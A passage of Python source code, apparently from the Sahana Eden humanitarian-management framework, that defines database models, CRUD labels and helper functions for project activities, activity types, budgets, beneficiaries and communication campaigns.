totals=True
)
),
list_fields = list_fields,
)
# Reusable Field
activity_id = S3ReusableField("activity_id", table,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db, "project_activity.id",
self.project_activity_represent,
sort=True)),
represent = self.project_activity_represent,
label = ACTIVITY,
comment = S3AddResourceLink(ADD_ACTIVITY,
c="project", f="activity",
tooltip=ACTIVITY_TOOLTIP),
ondelete = "CASCADE")
# Components
# Activity Types
add_component("project_activity_type",
project_activity=dict(link="project_activity_activity_type",
joinby="activity_id",
key="activity_type_id",
actuate="replace",
autocomplete="name",
autodelete=False))
# Beneficiaries
add_component("project_beneficiary",
project_activity=dict(link="project_beneficiary_activity",
joinby="activity_id",
key="beneficiary_id",
actuate="hide"))
# Format for InlineComponent/filter_widget
add_component("project_beneficiary_activity",
project_activity="activity_id")
# Tasks
add_component("project_task",
project_activity=dict(link="project_task_activity",
joinby="activity_id",
key="task_id",
actuate="replace",
autocomplete="name",
autodelete=False))
# Coalitions
add_component("org_group",
project_activity=dict(link="project_activity_group",
joinby="activity_id",
key="group_id",
actuate="hide"))
# Format for InlineComponent/filter_widget
add_component("project_activity_group",
project_activity="activity_id")
# ---------------------------------------------------------------------
# Activity Type - Activity Link Table
#
tablename = "project_activity_activity_type"
table = define_table(tablename,
activity_id(empty=False),
self.project_activity_type_id(empty=False),
*s3_meta_fields())
crud_strings[tablename] = Storage(
title_create = T("New Activity Type"),
title_display = T("Activity Type"),
title_list = T("Activity Types"),
title_update = T("Edit Activity Type"),
title_search = T("Search Activity Types"),
title_upload = T("Import Activity Type data"),
subtitle_create = T("Add New Activity Type"),
label_list_button = T("List Activity Types"),
label_create_button = T("Add Activity Type to Activity"),
msg_record_created = T("Activity Type added to Activity"),
msg_record_modified = T("Activity Type Updated"),
msg_record_deleted = T("Activity Type removed from Activity"),
msg_list_empty = T("No Activity Types found for this Activity")
)
# Activity Organization
add_component("project_activity_organisation",
project_activity="activity_id")
# Pass names back to global scope (s3.*)
return dict(project_activity_id = activity_id,
)
# -------------------------------------------------------------------------
def defaults(self):
""" Safe defaults for model-global names if module is disabled """
dummy = S3ReusableField("dummy_id", "integer",
readable=False,
writable=False)
return dict(project_activity_id = lambda **attr: dummy("activity_id"),
)
# -------------------------------------------------------------------------
    @staticmethod
    def project_activity_represent(id, row=None):
        """
            Show activities with a prefix of the project code

            @param id: the project_activity record ID
                       (ignored when row is given; None => generic NONE message)
            @param row: a project_activity Row, saves the activity lookup
                        (assumes it carries project_id — TODO confirm callers)

            @return: "code > name" when the project has a code,
                     otherwise just the activity name
        """
        if row:
            activity = row
            db = current.db
            # Fetch the project record
            ptable = db.project_project
            project = db(ptable.id == row.project_id).select(ptable.code,
                                                             limitby=(0, 1)).first()
        elif not id:
            return current.messages["NONE"]
        else:
            db = current.db
            table = db.project_activity
            ptable = db.project_project
            # Left join so activities without a project still resolve
            left = ptable.on(ptable.id == table.project_id)
            row = db(table.id == id).select(table.name,
                                            table.project_id,
                                            ptable.code,
                                            left=left,
                                            limitby=(0, 1)).first()
            try:
                # Joined Rows are keyed by table
                project = row[ptable]
                activity = row[table]
            except:
                # row is None => record not found
                return current.messages.UNKNOWN_OPT
        if project and project.code:
            return "%s > %s" % (project.code, activity.name)
        else:
            return activity.name
# -------------------------------------------------------------------------
    @staticmethod
    def project_activity_deduplicate(item):
        """
            Import item de-duplication

            Matches activities by (project_id, name); on a match, the
            import item is switched from insert to update of the
            existing record.

            @param item: the S3ImportItem to check
        """
        if item.tablename != "project_activity":
            return
        data = item.data
        if "project_id" in data and \
           "name" in data:
            # Match activity by project_id and name
            project_id = data.project_id
            name = data.name
            table = item.table
            query = (table.project_id == project_id) & \
                    (table.name == name)
            duplicate = current.db(query).select(table.id,
                                                 limitby=(0, 1)).first()
            if duplicate:
                # Update the existing record instead of inserting a new one
                item.id = duplicate.id
                item.method = item.METHOD.UPDATE
# =============================================================================
class S3ProjectActivityTypeModel(S3Model):
    """
        Project Activity Type Model

        This model holds the Activity Types for Projects
        - it is useful where we don't have the details on the actual Activities,
          but just this summary of Types
    """

    names = ["project_activity_type",
             "project_activity_type_location",
             "project_activity_type_project",
             "project_activity_type_sector",
             "project_activity_type_id",
             ]

    def model(self):
        """
            Defines the project_activity_type table, its link tables to
            Sectors, Project Locations and Projects, and the reusable
            activity_type_id foreign key
        """

        T = current.T
        db = current.db
        crud_strings = current.response.s3.crud_strings
        define_table = self.define_table

        # ---------------------------------------------------------------------
        # Activity Types
        #
        tablename = "project_activity_type"
        table = define_table(tablename,
                             Field("name", length=128,
                                   notnull=True, unique=True),
                             s3_comments(),
                             *s3_meta_fields())

        # CRUD Strings
        ADD_ACTIVITY_TYPE = T("Add Activity Type")
        crud_strings[tablename] = Storage(
            title_create = ADD_ACTIVITY_TYPE,
            title_display = T("Activity Type"),
            title_list = T("Activity Types"),
            title_update = T("Edit Activity Type"),
            title_search = T("Search for Activity Type"),
            subtitle_create = T("Add New Activity Type"),
            label_list_button = T("List Activity Types"),
            label_create_button = ADD_ACTIVITY_TYPE,
            msg_record_created = T("Activity Type Added"),
            msg_record_modified = T("Activity Type Updated"),
            msg_record_deleted = T("Activity Type Deleted"),
            msg_list_empty = T("No Activity Types Found")
        )

        # Reusable Fields
        # Translated name representation, used for both the dropdown and read views
        represent = S3Represent(lookup=tablename, translate=True)
        activity_type_id = S3ReusableField("activity_type_id", table,
                                           sortby = "name",
                                           requires = IS_NULL_OR(
                                                        IS_ONE_OF(db, "project_activity_type.id",
                                                                  represent,
                                                                  sort=True)),
                                           represent = represent,
                                           label = T("Activity Type"),
                                           comment = S3AddResourceLink(title=ADD_ACTIVITY_TYPE,
                                                                       c="project",
                                                                       f="activity_type",
                                                                       tooltip=T("If you don't see the type in the list, you can add a new one by clicking link 'Add Activity Type'.")),
                                           ondelete = "SET NULL")

        # Component (for Custom Form)
        self.add_component("project_activity_type_sector",
                           project_activity_type="activity_type_id")

        crud_form = S3SQLCustomForm(
                        "name",
                        # Sectors
                        S3SQLInlineComponent(
                            "activity_type_sector",
                            label=T("Sectors to which this Activity Type can apply"),
                            fields=["sector_id"],
                        ),
                    )

        self.configure(tablename,
                       crud_form=crud_form,
                       list_fields=["id",
                                    "name",
                                    (T("Sectors"), "activity_type_sector.sector_id"),
                                    "comments",
                                    ])

        # ---------------------------------------------------------------------
        # Activity Type - Sector Link Table
        #
        tablename = "project_activity_type_sector"
        table = define_table(tablename,
                             activity_type_id(empty=False),
                             self.org_sector_id(label="",
                                                empty=False),
                             *s3_meta_fields())

        # ---------------------------------------------------------------------
        # Activity Type - Project Location Link Table
        #
        tablename = "project_activity_type_location"
        table = define_table(tablename,
                             activity_type_id(empty=False),
                             self.project_location_id(empty=False),
                             *s3_meta_fields())

        # ---------------------------------------------------------------------
        # Activity Type - Project Link Table
        #
        tablename = "project_activity_type_project"
        table = define_table(tablename,
                             activity_type_id(empty=False),
                             self.project_project_id(empty=False),
                             *s3_meta_fields())

        crud_strings[tablename] = Storage(
            title_create = T("New Activity Type"),
            title_display = T("Activity Type"),
            title_list = T("Activity Types"),
            title_update = T("Edit Activity Type"),
            title_search = T("Search Activity Types"),
            title_upload = T("Import Activity Type data"),
            subtitle_create = T("Add New Activity Type"),
            label_list_button = T("List Activity Types"),
            label_create_button = T("Add Activity Type to Project Location"),
            msg_record_created = T("Activity Type added to Project Location"),
            msg_record_modified = T("Activity Type Updated"),
            msg_record_deleted = T("Activity Type removed from Project Location"),
            msg_list_empty = T("No Activity Types found for this Project Location")
        )

        # Pass names back to global scope (s3.*)
        return dict(project_activity_type_id = activity_type_id,
                    )
# =============================================================================
class S3ProjectActivityOrganisationModel(S3Model):
    """
        Project Activity Organisation Model

        This model holds the Activity Organisations for Projects
        - it is useful where we don't have the details on the actual Activities,
          but just this summary of Organisations
    """

    names = ["project_activity_organisation",
             "project_activity_group",
             ]

    def model(self):
        """
            Defines the link tables between Activities and Organisations
            resp. Organisation Groups (Coalitions)
        """

        T = current.T
        define_table = self.define_table
        project_activity_id = self.project_activity_id

        # ---------------------------------------------------------------------
        # Activities <> Organisations - Link table
        #
        tablename = "project_activity_organisation"
        table = define_table(tablename,
                             project_activity_id(empty=False),
                             self.org_organisation_id(empty=False),
                             *s3_meta_fields())

        # CRUD Strings
        ADD_ACTIVITY_ORG = T("Add Activity Organisation")
        current.response.s3.crud_strings[tablename] = Storage(
            title_create = ADD_ACTIVITY_ORG,
            title_display = T("Activity Organisation"),
            title_list = T("Activity Organisations"),
            title_update = T("Edit Activity Organisation"),
            title_search = T("Search for Activity Organisation"),
            subtitle_create = T("Add New Activity Organisation"),
            label_list_button = T("List Activity Organisations"),
            label_create_button = ADD_ACTIVITY_ORG,
            msg_record_created = T("Activity Organisation Added"),
            msg_record_modified = T("Activity Organisation Updated"),
            msg_record_deleted = T("Activity Organisation Deleted"),
            msg_list_empty = T("No Activity Organisations Found")
        )

        # ---------------------------------------------------------------------
        # Activities <> Organisation Groups - Link table
        #
        tablename = "project_activity_group"
        table = define_table(tablename,
                             project_activity_id(empty=False),
                             self.org_group_id(empty=False),
                             *s3_meta_fields())

        # Pass names back to global scope (s3.*)
        # (nothing to export from this model)
        return dict()
# =============================================================================
class S3ProjectAnnualBudgetModel(S3Model):
    """
        Project Budget Model

        This model holds the annual budget entries for projects
    """

    names = ["project_annual_budget"]

    def model(self):
        """
            Defines the project_annual_budget table:
            one amount+currency entry per project per year
        """

        T = current.T
        db = current.db

        # ---------------------------------------------------------------------
        # Annual Budgets
        #
        tablename = "project_annual_budget"
        self.define_table(tablename,
                          self.project_project_id(
                                # Override requires so that update access to the projects isn't required
                                requires = IS_ONE_OF(db, "project_project.id",
                                                     self.project_project_represent
                                                     )
                                ),
                          Field("year", "integer", notnull=True,
                                default=None, # make it current year
                                requires=IS_INT_IN_RANGE(1950, 3000),
                                label=T("Year"),
                                ),
                          Field("amount", "double", notnull=True,
                                default=0.00,
                                requires=IS_FLOAT_AMOUNT(),
                                label=T("Amount"),
                                ),
                          s3_currency(required=True),
                          *s3_meta_fields())

        # CRUD Strings
        current.response.s3.crud_strings[tablename] = Storage(
            title_create = T("New Annual Budget"),
            title_display = T("Annual Budget"),
            title_list = T("Annual Budgets"),
            title_update = T("Edit Annual Budget"),
            title_search = T("Search Annual Budgets"),
            title_upload = T("Import Annual Budget data"),
            title_report = T("Report on Annual Budgets"),
            subtitle_create = T("Add New Annual Budget"),
            label_list_button = T("List Annual Budgets"),
            label_create_button = T("New Annual Budget"),
            msg_record_created = T("New Annual Budget created"),
            msg_record_modified = T("Annual Budget updated"),
            msg_record_deleted = T("Annual Budget deleted"),
            msg_list_empty = T("No annual budgets found")
        )

        self.configure(tablename,
                       list_fields=["id",
                                    "year",
                                    "amount",
                                    "currency",
                                    ]
                       )

        # Pass names back to global scope (s3.*)
        # (nothing to export from this model)
        return dict()
# =============================================================================
class S3ProjectBeneficiaryModel(S3Model):
    """
        Project Beneficiary Model
        - depends on Stats module

        Defines beneficiary types (stats parameters) and the
        per-project-location beneficiary counts (stats data instances).
    """

    names = ["project_beneficiary_type",
             "project_beneficiary",
             ]

    def model(self):
        """
            Defines project_beneficiary_type, project_beneficiary and
            the beneficiary<>activity link table

            Returns an empty dict (and skips all definitions) when the
            Stats module is disabled, since both main tables are
            stats_parameter/stats_data instances.
        """

        if not current.deployment_settings.has_module("stats"):
            # Beneficiary Model needs Stats module enabling
            return dict()

        T = current.T
        db = current.db

        configure = self.configure
        crud_strings = current.response.s3.crud_strings
        define_table = self.define_table
        super_link = self.super_link

        # ---------------------------------------------------------------------
        # Project Beneficiary Type
        #
        tablename = "project_beneficiary_type"
        table = define_table(tablename,
                             super_link("parameter_id", "stats_parameter"),
                             Field("name", length=128, unique=True,
                                   requires = IS_NOT_IN_DB(db,
                                                           "project_beneficiary_type.name")),
                             s3_comments("description",
                                         label = T("Description")),
                             *s3_meta_fields())

        # CRUD Strings
        ADD_BNF_TYPE = T("Add Beneficiary Type")
        crud_strings[tablename] = Storage(
            title_create = ADD_BNF_TYPE,
            title_display = T("Beneficiary Type"),
            title_list = T("Beneficiary Types"),
            title_update = T("Edit Beneficiary Type"),
            title_search = T("Search Beneficiary Types"),
            subtitle_create = T("Add New Beneficiary Type"),
            label_list_button = T("List Beneficiary Types"),
            label_create_button = ADD_BNF_TYPE,
            msg_record_created = T("Beneficiary Type Added"),
            msg_record_modified = T("Beneficiary Type Updated"),
            msg_record_deleted = T("Beneficiary Type Deleted"),
            msg_list_empty = T("No Beneficiary Types Found")
        )

        # Resource Configuration
        configure(tablename,
                  super_entity = "stats_parameter",
                  )

        # ---------------------------------------------------------------------
        # Project Beneficiary
        #
        # @ToDo: Split project_id & project_location_id to separate Link Tables
        #
        tablename = "project_beneficiary"
        table = define_table(tablename,
                             # Link Fields
                             # populated automatically
                             self.project_project_id(readable=False,
                                                     writable=False),
                             self.project_location_id(comment=None),
                             # Instance
                             super_link("data_id", "stats_data"),
                             # This is a component, so needs to be a super_link
                             # - can't override field name, ondelete or requires
                             super_link("parameter_id", "stats_parameter",
                                        label = T("Beneficiary Type"),
                                        instance_types = ["project_beneficiary_type"],
                                        represent = S3Represent(lookup="stats_parameter",
                                                                translate=True,
                                                                ),
                                        readable = True,
                                        writable = True,
                                        empty = False,
                                        comment = S3AddResourceLink(c="project",
                                                                    f="beneficiary_type",
                                                                    vars = dict(child = "parameter_id"),
                                                                    title=ADD_BNF_TYPE,
                                                                    tooltip=T("Please record Beneficiary according to the reporting needs of your project")),
                                        ),
                             # Populated automatically from project_location
                             self.gis_location_id(readable = False,
                                                  writable = False),
                             Field("value", "integer",
                                   label = T("Quantity"),
                                   requires = IS_INT_IN_RANGE(0, 99999999),
                                   represent = lambda v: \
                                               IS_INT_AMOUNT.represent(v)
                                   ),
                             s3_date("date",
                                     label = T("Start Date"),
                                     #empty = False,
                                     ),
                             s3_date("end_date",
                                     label = T("End Date"),
                                     #empty = False,
                                     ),
                             #self.stats_source_id(),
                             s3_comments(),
                             *s3_meta_fields())

        # Virtual fields
        # Lazy "year" field: list of years the record spans (see project_beneficiary_year)
        table.year = Field.Lazy(self.project_beneficiary_year)

        # CRUD Strings
        ADD_BNF = T("Add Beneficiaries")
        crud_strings[tablename] = Storage(
            title_create = ADD_BNF,
            title_display = T("Beneficiaries Details"),
            title_list = T("Beneficiaries"),
            title_update = T("Edit Beneficiaries"),
            title_search = T("Search Beneficiaries"),
            title_report = T("Beneficiary Report"),
            subtitle_create = T("Add New Beneficiaries"),
            label_list_button = T("List Beneficiaries"),
            label_create_button = ADD_BNF,
            msg_record_created = T("Beneficiaries Added"),
            msg_record_modified = T("Beneficiaries Updated"),
            msg_record_deleted = T("Beneficiaries Deleted"),
            msg_list_empty = T("No Beneficiaries Found")
        )

        # Resource Configuration
        report_fields = ["project_location_id",
                         (T("Beneficiary Type"), "parameter_id"),
                         "project_id",
                         (T("Year"), "year"),
                         "project_id$hazard.name",
                         "project_id$theme.name",
                         (current.messages.COUNTRY, "location_id$L0"),
                         "location_id$L1",
                         "location_id$L2",
                         "location_id$L3",
                         "location_id$L4",
                         ]

        # ---------------------------------------------------------------------
        def year_options():
            """
                returns a dict of the options for the year virtual field
                used by the search widget

                orderby needed for postgres

                Derives the range from the earliest project/beneficiary
                start date to the latest end date.
            """

            ptable = db.project_project
            pbtable = db.project_beneficiary
            pquery = (ptable.deleted == False)
            pbquery = (pbtable.deleted == False)
            pmin = ptable.start_date.min()
            pbmin = pbtable.date.min()
            p_start_date_min = db(pquery).select(pmin,
                                                 orderby=pmin,
                                                 limitby=(0, 1)).first()[pmin]
            pb_date_min = db(pbquery).select(pbmin,
                                             orderby=pbmin,
                                             limitby=(0, 1)).first()[pbmin]
            if p_start_date_min and pb_date_min:
                start_year = min(p_start_date_min,
                                 pb_date_min).year
            else:
                start_year = (p_start_date_min and p_start_date_min.year) or \
                             (pb_date_min and pb_date_min.year)

            pmax = ptable.end_date.max()
            pbmax = pbtable.end_date.max()
            p_end_date_max = db(pquery).select(pmax,
                                               orderby=pmax,
                                               limitby=(0, 1)).first()[pmax]
            pb_end_date_max = db(pbquery).select(pbmax,
                                                 orderby=pbmax,
                                                 limitby=(0, 1)).first()[pbmax]
            if p_end_date_max and pb_end_date_max:
                end_year = max(p_end_date_max,
                               pb_end_date_max).year
            else:
                end_year = (p_end_date_max and p_end_date_max.year) or \
                           (pb_end_date_max and pb_end_date_max.year)

            if not start_year or not end_year:
                # NOTE(review): {None: None} is truthy, so when start_year is
                # None the first dict is returned and the second is never
                # reached — verify this is the intended fallback
                return {start_year:start_year} or {end_year:end_year}
            years = {}
            for year in xrange(start_year, end_year + 1):
                years[year] = year
            return years

        configure(tablename,
                  super_entity = "stats_data",
                  onaccept=self.project_beneficiary_onaccept,
                  deduplicate=self.project_beneficiary_deduplicate,
                  report_options=Storage(
                    search=[
                        S3SearchOptionsWidget(
                            field="project_id",
                            name="project",
                            label=T("Project")
                        ),
                        S3SearchOptionsWidget(
                            field="parameter_id",
                            name="parameter_id",
                            label=T("Beneficiary Type")
                        ),
                        # @ToDo: These do no work - no results are returned
                        S3SearchOptionsWidget(
                            field="year",
                            name="year",
                            label=T("Year"),
                            options = year_options
                        ),
                        S3SearchOptionsWidget(
                            name = "beneficiary_search_L1",
                            field = "location_id$L1",
                            location_level = "L1",
                            cols = 3,
                        ),
                    ],
                    rows=report_fields,
                    cols=report_fields,
                    fact=["value"],
                    methods=["sum"],
                    defaults=Storage(rows="beneficiary.project_id",
                                     cols="beneficiary.parameter_id",
                                     fact="beneficiary.value",
                                     aggregate="sum",
                                     totals=True
                                     )
                  ),
                  # Needed by the "year" lazy virtual field
                  extra_fields = ["project_id", "date", "end_date"]
                  )

        # Reusable Field
        beneficiary_id = S3ReusableField("beneficiary_id", table,
                                         sortby="name",
                                         requires = IS_NULL_OR(
                                                      IS_ONE_OF(db, "project_beneficiary.id",
                                                                self.project_beneficiary_represent,
                                                                sort=True)),
                                         represent = self.project_beneficiary_represent,
                                         label = T("Beneficiaries"),
                                         comment = S3AddResourceLink(c="project",
                                                                     f="beneficiary",
                                                                     title=ADD_BNF,
                                                                     tooltip=\
                                            T("If you don't see the beneficiary in the list, you can add a new one by clicking link 'Add Beneficiary'.")),
                                         ondelete = "SET NULL")

        # ---------------------------------------------------------------------
        # Beneficiary <> Activity Link Table
        #
        tablename = "project_beneficiary_activity"
        table = define_table(tablename,
                             self.project_activity_id(),
                             beneficiary_id(),
                             #s3_comments(),
                             *s3_meta_fields())

        # Pass names back to global scope (s3.*)
        # (nothing to export from this model)
        return dict()

    # -------------------------------------------------------------------------
    @staticmethod
    def project_beneficiary_represent(id, row=None):
        """
            FK representation: "<value> <type name>"

            @param id: the project_beneficiary record ID
            @param row: a Row with a "type" attribute (optional)

            @ToDo: Bulk
        """

        if row:
            return row.type
        if not id:
            return current.messages["NONE"]

        db = current.db
        table = db.project_beneficiary
        ttable = db.project_beneficiary_type
        # Inner join beneficiary -> type for the label
        query = (table.id == id) & \
                (table.parameter_id == ttable.id)
        r = db(query).select(table.value,
                             ttable.name,
                             limitby = (0, 1)).first()
        try:
            return "%s %s" % (r["project_beneficiary.value"],
                              r["project_beneficiary_type.name"])
        except:
            # r is None => record not found
            return current.messages.UNKNOWN_OPT

    # ---------------------------------------------------------------------
    @staticmethod
    def project_beneficiary_onaccept(form):
        """
            Update project_beneficiary project & location from project_location_id

            Denormalises project_id/location_id from the linked
            project_location record after create/update.

            @param form: the FORM with the record id in form.vars.id
        """

        db = current.db
        btable = db.project_beneficiary
        ltable = db.project_location

        record_id = form.vars.id
        query = (btable.id == record_id) & \
                (ltable.id == btable.project_location_id)
        project_location = db(query).select(ltable.project_id,
                                            ltable.location_id,
                                            limitby=(0, 1)).first()
        if project_location:
            db(btable.id == record_id).update(
                    project_id = project_location.project_id,
                    location_id = project_location.location_id
                )
        return

    # ---------------------------------------------------------------------
    @staticmethod
    def project_beneficiary_deduplicate(item):
        """
            Import item de-duplication

            Matches beneficiaries by (parameter_id, project_location_id)
            and turns inserts of duplicates into updates.

            @param item: the S3ImportItem to check
        """

        if item.tablename != "project_beneficiary":
            return

        data = item.data
        if "parameter_id" in data and \
           "project_location_id" in data:
            # Match beneficiary by type and project_location
            table = item.table
            parameter_id = data.parameter_id
            project_location_id = data.project_location_id
            query = (table.parameter_id == parameter_id) & \
                    (table.project_location_id == project_location_id)
            duplicate = current.db(query).select(table.id,
                                                 limitby=(0, 1)).first()
            if duplicate:
                item.id = duplicate.id
                item.method = item.METHOD.UPDATE
        return

    # ---------------------------------------------------------------------
    @staticmethod
    def project_beneficiary_year(row):
        """
            Virtual field for the project_beneficiary table

            @param row: the Row (possibly a joined Row keyed by table)
            @return: list of years spanned by the record's date..end_date,
                     falling back to the project's start/end dates;
                     [] if no dates can be determined
        """

        if hasattr(row, "project_beneficiary"):
            row = row.project_beneficiary

        try:
            project_id = row.project_id
        except AttributeError:
            return []
        try:
            date = row.date
        except AttributeError:
            date = None
        try:
            end_date = row.end_date
        except AttributeError:
            end_date = None

        if not date or not end_date:
            # Fall back to the project's own date range
            table = current.s3db.project_project
            project = current.db(table.id == project_id) \
                             .select(table.start_date,
                                     table.end_date,
                                     limitby=(0, 1)).first()
            if project:
                if not date:
                    date = project.start_date
                if not end_date:
                    end_date = project.end_date

        if not date and not end_date:
            return []
        elif not end_date:
            return [date.year]
        elif not date:
            return [end_date.year]
        else:
            return list(xrange(date.year, end_date.year + 1))
# =============================================================================
class S3ProjectCampaignModel(S3Model):
    """
        Project Campaign Model
        - used for TERA integration:
          http://www.ifrc.org/en/what-we-do/beneficiary-communications/tera/
        - depends on Stats module
    """

    names = ["project_campaign",
             "project_campaign_message",
             "project_campaign_keyword",
             #"project_campaign_response",
             "project_campaign_response_summary",
             ]

    def model(self):
        """
            Defines Campaigns, the Messages broadcast for them, the
            Keywords tracked in responses (stats parameters) and the
            aggregated Response Summaries (stats data instances)
        """

        if not current.deployment_settings.has_module("stats"):
            # Campaigns Model needs Stats module enabling
            return dict()

        T = current.T
        db = current.db

        add_component = self.add_component
        configure = self.configure
        crud_strings = current.response.s3.crud_strings
        define_table = self.define_table
        super_link = self.super_link

        location_id = self.gis_location_id

        # ---------------------------------------------------------------------
        # Project Campaign
        #
        tablename = "project_campaign"
        table = define_table(tablename,
                             #self.project_project_id(),
                             Field("name", length=128, #unique=True,
                                   #requires = IS_NOT_IN_DB(db,
                                   #                        "project_campaign.name")
                                   ),
                             s3_comments("description",
                                         label = T("Description")),
                             *s3_meta_fields())

        # CRUD Strings
        ADD_CAMPAIGN = T("Add Campaign")
        crud_strings[tablename] = Storage(
            title_create = ADD_CAMPAIGN,
            title_display = T("Campaign"),
            title_list = T("Campaigns"),
            title_update = T("Edit Campaign"),
            title_search = T("Search Campaigns"),
            subtitle_create = T("Add New Campaign"),
            label_list_button = T("List Campaigns"),
            label_create_button = ADD_CAMPAIGN,
            msg_record_created = T("Campaign Added"),
            msg_record_modified = T("Campaign Updated"),
            msg_record_deleted = T("Campaign Deleted"),
            msg_list_empty = T("No Campaigns Found")
        )

        # Reusable Field
        represent = S3Represent(lookup=tablename)
        campaign_id = S3ReusableField("campaign_id", table,
                                      sortby="name",
                                      requires = IS_NULL_OR(
                                                    IS_ONE_OF(db, "project_campaign.id",
                                                              represent,
                                                              sort=True)),
                                      represent = represent,
                                      label = T("Campaign"),
                                      comment = S3AddResourceLink(c="project",
                                                                  f="campaign",
                                                                  title=ADD_CAMPAIGN,
                                                                  tooltip=\
                                        T("If you don't see the campaign in the list, you can add a new one by clicking link 'Add Campaign'.")),
                                      ondelete = "CASCADE")

        add_component("project_campaign_message",
                      project_campaign="campaign_id")

        # ---------------------------------------------------------------------
        # Project Campaign Message
        # - a Message to broadcast to a geographic location (Polygon)
        #
        tablename = "project_campaign_message"
        table = define_table(tablename,
                             campaign_id(),
                             Field("name", length=128, #unique=True,
                                   #requires = IS_NOT_IN_DB(db,
                                   #                        "project_campaign.name")
                                   ),
                             s3_comments("message",
                                         label = T("Message")),
                             location_id(
                                widget = S3LocationSelectorWidget(
                                   catalog_layers=True,
                                   polygon=True
                                   )
                                ),
                             # @ToDo: Allow selection of which channel message should be sent out on
                             #self.msg_channel_id(),
                             # @ToDo: Record the Message sent out
                             #self.msg_message_id(),
                             s3_comments(),
                             *s3_meta_fields())

        # CRUD Strings
        # NOTE(review): these strings say "Campaign", not "Campaign Message" —
        # possibly copied from the campaign table; verify intent
        ADD_CAMPAIGN = T("Add Campaign")
        crud_strings[tablename] = Storage(
            title_create = ADD_CAMPAIGN,
            title_display = T("Campaign"),
            title_list = T("Campaigns"),
            title_update = T("Edit Campaign"),
            title_search = T("Search Campaigns"),
            subtitle_create = T("Add New Campaign"),
            label_list_button = T("List Campaigns"),
            label_create_button = ADD_CAMPAIGN,
            msg_record_created = T("Campaign Added"),
            msg_record_modified = T("Campaign Updated"),
            msg_record_deleted = T("Campaign Deleted"),
            msg_list_empty = T("No Campaigns Found")
        )

        # Reusable Field
        represent = S3Represent(lookup=tablename)
        message_id = S3ReusableField("campaign_message_id", table,
                                     sortby="name",
                                     requires = IS_NULL_OR(
                                                    IS_ONE_OF(db, "project_campaign_message.id",
                                                              represent,
                                                              sort=True)),
                                     represent = represent,
                                     label = T("Campaign Message"),
                                     ondelete = "CASCADE")

        #add_component("project_campaign_response",
        #              project_campaign_message="campaign_message_id")

        add_component("project_campaign_response_summary",
                      project_campaign_message="campaign_message_id")

        # ---------------------------------------------------------------------
        # Project Campaign Keyword
        # - keywords in responses which are used in Stats reporting
        #
        tablename = "project_campaign_keyword"
        table = define_table(tablename,
                             super_link("parameter_id", "stats_parameter"),
                             Field("name", length=128, unique=True,
                                   requires = IS_NOT_IN_DB(db,
                                                           "project_campaign_keyword.name")),
                             s3_comments("description",
                                         label = T("Description")),
                             *s3_meta_fields())

        # CRUD Strings
        ADD_CAMPAIGN_KW = T("Add Keyword")
        crud_strings[tablename] = Storage(
            title_create = ADD_CAMPAIGN_KW,
            title_display = T("Keyword"),
            title_list = T("Keywords"),
            title_update = T("Edit Keyword"),
            title_search = T("Search Keywords"),
            subtitle_create = T("Add New Keyword"),
            label_list_button = T("List Keywords"),
            label_create_button = ADD_CAMPAIGN_KW,
            msg_record_created = T("Keyword Added"),
            msg_record_modified = T("Keyword Updated"),
            msg_record_deleted = T("Keyword Deleted"),
            msg_list_empty = T("No Keywords Found")
        )

        # Resource Configuration
        configure(tablename,
                  super_entity = "stats_parameter",
                  )

        # ---------------------------------------------------------------------
        # Project Campaign Response
        # - individual response (unused for TERA)
        # - this can be populated by parsing raw responses
        # - these are aggregated into project_campaign_response_summary
        #
        #tablename = "project_campaign_response"
        #table = define_table(tablename,
        #                     message_id(),
                             # This is a component, so needs to be a super_link
                             # - can't override field name, ondelete or requires
        #                     super_link("parameter_id", "stats_parameter",
        #                                label = T("Keyword"),
        #                                instance_types = ["project_campaign_keyword"],
        #                                represent = S3Represent(lookup="stats_parameter"),
        #                                readable = True,
        #                                writable = True,
        #                                empty = False,
        #                                ),
                             # Getting this without TERA may be hard!
                             #location_id(writable = False),
                             # @ToDo: Link to the raw Message received
                             #self.msg_message_id(),
        #                     s3_datetime(),
        #                     s3_comments(),
        #                     *s3_meta_fields())

        # CRUD Strings
        #ADD_CAMPAIGN_RESP = T("Add Response")
        #crud_strings[tablename] = Storage(
        #    title_create = ADD_CAMPAIGN_RESP,
        #    title_display = T("Response Details"),
        #    title_list = T("Responses"),
        #    title_update = T("Edit Response"),
        #    title_search = T("Search Responses"),
        #    title_report = T("Response Report"),
        #    subtitle_create = T("Add New Response"),
        #    label_list_button = T("List Responses"),
        #    label_create_button = ADD_CAMPAIGN_RESP,
        #    msg_record_created = T("Response Added"),
        #    msg_record_modified = T("Response Updated"),
        #    msg_record_deleted = T("Response Deleted"),
        #    msg_list_empty = T("No Responses Found")
        #)

        # ---------------------------------------------------------------------
        # Project Campaign Response Summary
        # - aggregated responses (by Keyword/Location)
        # - TERA data comes in here
        #
        tablename = "project_campaign_response_summary"
        table = define_table(tablename,
                             message_id(),
                             # Instance
                             super_link("data_id", "stats_data"),
                             # This is a component, so needs to be a super_link
                             # - can't override field name, ondelete or requires
                             super_link("parameter_id", "stats_parameter",
                                        label = T("Keyword"),
                                        instance_types = ["project_campaign_keyword"],
                                        represent = S3Represent(lookup="stats_parameter"),
                                        readable = True,
                                        writable = True,
                                        empty = False,
                                        ),
                             # Populated automatically (by TERA)
                             # & will be a msg_basestation?
                             location_id(writable = False),
                             Field("value", "integer",
                                   label = T("Number of Responses"),
                                   requires = IS_INT_IN_RANGE(0, 99999999),
                                   represent = lambda v: \
                                               IS_INT_AMOUNT.represent(v)),
                             # @ToDo: Populate automatically from time Message is sent?
                             s3_date("date",
                                     label = T("Start Date"),
                                     #empty = False,
                                     ),
                             s3_date("end_date",
                                     label = T("End Date"),
                                     #empty = False,
                                     ),
                             s3_comments(),
                             *s3_meta_fields())

        # CRUD Strings
        ADD_CAMPAIGN_RESP_SUMM = T("Add Response Summary")
        crud_strings[tablename] = Storage(
            title_create = ADD_CAMPAIGN_RESP_SUMM,
            title_display = T("Response Summary Details"),
            title_list = T("Response Summaries"),
            title_update = T("Edit Response Summary"),
            title_search = T("Search Response Summaries"),
            title_report = T("Response Summary Report"),
            subtitle_create = T("Add New Response Summary"),
            label_list_button = T("List Response Summaries"),
            label_create_button = ADD_CAMPAIGN_RESP_SUMM,
            msg_record_created = T("Response Summary Added"),
            msg_record_modified = T("Response Summary Updated"),
            msg_record_deleted = T("Response Summary Deleted"),
            msg_list_empty = T("No Response Summaries Found")
        )

        # Pass names back to global scope (s3.*)
        # (nothing to export from this model)
        return dict()
# =============================================================================
